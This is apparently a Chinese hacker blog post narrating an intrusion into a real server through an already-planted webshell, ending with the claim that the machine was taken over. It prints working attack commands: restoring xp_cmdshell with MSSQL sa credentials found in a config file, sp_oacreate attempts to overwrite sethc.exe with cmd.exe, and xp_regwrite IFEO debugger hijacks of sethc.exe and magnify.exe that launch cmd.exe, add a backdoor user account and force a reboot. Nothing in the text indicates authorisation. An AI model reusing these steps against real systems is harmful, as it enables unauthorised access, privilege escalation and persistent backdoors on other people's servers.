Shell是双面大牛给的，在我打算看《轩辕剑》的时候，面面大牛说我无聊就让我看看提权，俺立马没了兴趣，为啥，双面大牛都没有搞定的，我能搞定吗..但是发现这个网速看电影真的没用。还是硬着头皮上咯！
 
一看是aspx的，先扫描下开启了什么端口
 
1433，3306，43958对应的MSSQL、MYSQL和Serv-U。
先来看看Serv-U是不是可以提权（PS：要是这么容易就搞定了面面大牛会看上我吗？）。
 
提示：由于目标机器积极拒绝，无法连接。
问面面大牛，说是Serv-U服务暂停了，那这条路堵死了。下面来看看执行命令
 
居然自带的c:\windows\system32\cmd.exe不能执行，那咱们换个可读写的目录上传一个试试
 
然后再执行试试
 
然后继续systeminfo来看看
 
其实吧，重点是补丁信息
 
问面面大牛，他说补丁全满了。菜鸟不信，果断的多次测试，无果..发现面面大牛果然没有说错。
 
他突然说是有人日过了，我就看看留下什么蛛丝马迹没
 
居然还有隐藏的帐号，看来确实是被KO的惨了，经过多次尝试弱口令，和想象的一样，没有进去，话说RP确实是差到了极点。再说也没有那个大牛会留下这样的弱口令吧。既然都死了，那再看看1433了。
 



顺利的找到了配置文件。嘿嘿，还是mssql的，看来有希望啊，可是不是SAa ,啊，麻烦了。管他的，连接去试试呗…
 
吐槽下，这人品，哈哈，其实RP也不差嘛，居然是SA，Microsoft SQL Server 2000。
那么来看看xp_cmdshell是不是存在，直接来增加xp_cmdshell组建
Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')
 
既然存在，那么就来直接执行命令呗..
Exec master.dbo.xp_cmdshell 'whoami'
 
xpsql.cpp: 错误5 来自CreateProcess（第737 行）
还真没有遇见过。搜索下.遇到这个困扰的,人还不少。原来。错误5是个系统提示的错误号，CreateProcess这个是创建线程的意思，这个错误产生和系统文件cmd.exe有很大的关系，一种情况是cmd被删除，一种是cmd的权限被降低了。
那貌似是路被堵死了，然后想起穿山甲上的执行命令的有两个组建。除了xp_cmdshell外还有sp_oacreate可以执行命令
用cmd替换sethc..
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\cmd.exe','c:\windows\system32\sethc.exe';
 
无法在库odsole70.dll 中找到函数sp_oacreate。原因: 127(找不到指定的程序。)。然后一直删除了，再恢复后
但是 我再次 使用declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\cmd.exe','c:\windows\system32\sethc.exe';
无法在库odsole70.dll 中找到函数sp_oacreate。原因: 127(找不到指定的程序。)。
 
原因我也没懂..搞了近乎一个下午。还是无果…
 
翻书的时候突然看见IFEO劫持…
既然我们是介绍IFEO技术相关，那我们就先介绍下： 一，什么是映像胁持（IFEO）？ 所谓的IFEO就是Image File Execution Options 在是位于注册表的HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options 由于这个项主要是用来调试程序用的，对一般用户意义不大。默认是只有管理员和local system有权读写修改
 
那就来玩一次IFEO劫持
EXEC master..xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE',
@value_name='Debugger',
@type='REG_SZ',
@value='C:\WINDOWS\system32\cmd.exe'
 
没有出错…嘿嘿…
那我们来查看是否劫持成功
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
 
DebuggerC:\WINDOWS\system32\cmd.exe
哈哈哈…居然成功了
 
呃…shift不行..
 




 
继续执行
EXEC master..xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe',
@value_name='Debugger',
@type='REG_SZ',
@value='C:\WINDOWS\system32\cmd.exe'
 
继续执行来查看是否劫持成功
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe','Debugger'
 
我郁闷，还是掉不出来
 
在想是不是系统的被禁用了，于是调用自己上传的cmd
EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe', @value_name='Debugger', @type='REG_SZ', @value='F:\umail\mysql\cmd.exe'
 
发现自己的也不行，就是弹不出来，然后面面牛封装了一个bat上去，发现添加用户也不成功。
然后面面大牛突提示：
 
那继续
EXEC master..xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe',
@value_name='Debugger',
@type='REG_SZ',
@value='F:\umail\mysql\net1.exe user guset a123456789/ /add'
然后执行查看
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe','Debugger'
 

成功了，但是估计也那啥，不管了，先看看
 
期间尝试了资源管理器和任务管理都没有成功
 
各种蛋疼
 
还是没有成功
 
好吧，继续
EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe', @value_name='Debugger', @type='REG_SZ', @value='c:\windows\system32\shutdown -r -t 0'
然后查看
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe','Debugger'
 
但是还是没有重新启动。一个晚上过去了，我还是没有搞定。
早上起来
 
咱们来膜拜下
 




 
 
好吧， 反正是拿下了..
 





 
感谢面面大牛的指导。